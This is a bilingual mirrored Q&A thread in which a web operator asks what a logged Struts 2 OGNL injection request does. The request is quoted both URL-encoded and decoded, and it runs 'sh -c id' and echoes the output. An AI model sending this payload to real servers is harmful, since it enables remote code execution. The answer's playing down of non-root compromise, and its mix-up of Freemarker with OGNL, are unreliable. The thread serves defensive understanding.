这个黑客想用这个 Java 代码做什么? [英] What is this hacker trying to do with this Java code?

问题描述

在我的网络服务器的服务器日志中，我注意到一个黑客正在尝试这个:

https://[域名]/index.action?action:${%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]{'sh','-c','id'})).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27),%23matt.getwriter().println(%23e),%23matt.getwriter().flush(),%23matt.getwriter().close()}

哪个 URL 解码为:

https://[域名]/index.action?action:${#a=(new java.lang.processbuilder(new java.lang.string[]{'sh','-c','id'})).start(),#b=#a.getinputstream(),#c=new java.io.inputstreamreader(#b),#d=new java.io.bufferedreader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),#matt.getwriter().println(#e),#matt.getwriter().flush(),#matt.getwriter().close()}

我的服务器不使用 Java，但我试图了解这个黑客在这里试图做什么以及为什么这可能是一个漏洞.毕竟，我不仅仅是一个开发者，还需要知道如何保护服务器，包括不是我设置的服务器.

代码似乎启动了一个新进程，然后尝试从输入流中读取数据.我假设这是当前网络会话的输入流.

由于此攻击也在/login.action 和各种其他 URL 以及不同的 Java 代码上进行过尝试，因此我认为它具有潜在危险.但我无法解释为什么这很危险.

特定域现在正在受到攻击，因为黑客试图查看它是否在运行 WordPress、Magenta 或其他已知系统，并且还尝试了几种不同的攻击.<​​/p>

但重要的是:域目前正在开发中，所有者仍然必须决定将使用哪些开发工具.选择是在 Java 和 ASP-NET 之间，如果他选择 Java，这次攻击是否危险?

解决方案

它试图利用 Struts 2 中的 RCE 漏洞，我认为 这个.糟糕的是，Freemarker 会执行 ${} 标签内的任何代码.

Freemarker 代码 开始执行id 以查看服务器是否以root 身份运行，从而提供对框的完全访问权限.即使是易受攻击的 Struts 版本在这里也可能不会太糟糕，因为除非您是 root，否则攻击者可能不会感兴趣.

攻击者的程序有很多这些旧漏洞，它们可以在非常不安全的服务器上工作，但即使是简单的管理协议也能防止这些业余攻击.只有在以 root 用户身份运行、使用旧版本的软件、使用弱密码或默认密码向 Internet 开放数据库服务器等时，您才会受到攻击.

无论您选择哪种技术，都会存在安全问题，您需要遵循 CVE.例如，像 Spring 这样的现代 Java 框架有一些，但远程代码执行非常罕见，这正是那些攻击程序所寻找的.

In my server log of my web server, I've noticed a hacker trying this:

https://[domain name]/index.action?action:${%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]{'sh','-c','id'})).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27),%23matt.getwriter().println(%23e),%23matt.getwriter().flush(),%23matt.getwriter().close()}

Which URL decodes to this:

https://[domain name]/index.action?action:${#a=(new java.lang.processbuilder(new java.lang.string[]{'sh','-c','id'})).start(),#b=#a.getinputstream(),#c=new java.io.inputstreamreader(#b),#d=new java.io.bufferedreader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),#matt.getwriter().println(#e),#matt.getwriter().flush(),#matt.getwriter().close()}

My server doesn't use Java but I'm trying to understand what this hacker is trying to do here and why this could be a vulnerability. After all, I'm not just a developer but also need to know about how to protect a server, including servers not set up by me.

Code seems to start a new process and then tries to read data from the input stream. I'm assuming this is the input stream of the current web session.

As this attack is also tried over /login.action and various other URL's and different Java code, I am considering it to be potential dangerous. But I can't explain why this is dangerous.

The specific domain is under attack right now as the hacker tries to see if it's running WordPress or Magenta or other known systems and also tries several different attacks.

But what matters is this: the domain is currently under development and the owner still has to decide which development tools will be used. The choices are between Java and ASP-NET so is this attack dangerous if he chooses to pick Java?

解决方案

It's trying to exploit a RCE vulnerability in Struts 2, I think this one. A bad one, Freemarker would execute any code inside ${} tags.

The Freemarker code starts a process to execute id to see if the server is running as root, giving full access to the box. Even a vulnerable Struts version might not be too bad here, since the attacker might not be interested unless you were root.

The attacker's program has a lot of these old vulnerabilities that would work on very unsafe servers, but even simple admin protocol will protect against these amateur attacks. You would only be vulnerable when running as root, using an old version of a software, opening up your db server to the internet with a weak or default password, etc.

Regardless of the technology you choose, there will be security issues and you need to follow the CVEs. For example a modern Java framework like Spring has a few, but remote code execution is quite rare, and that's what those attack programs look for.

这篇关于这个黑客想用这个 Java 代码做什么?的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！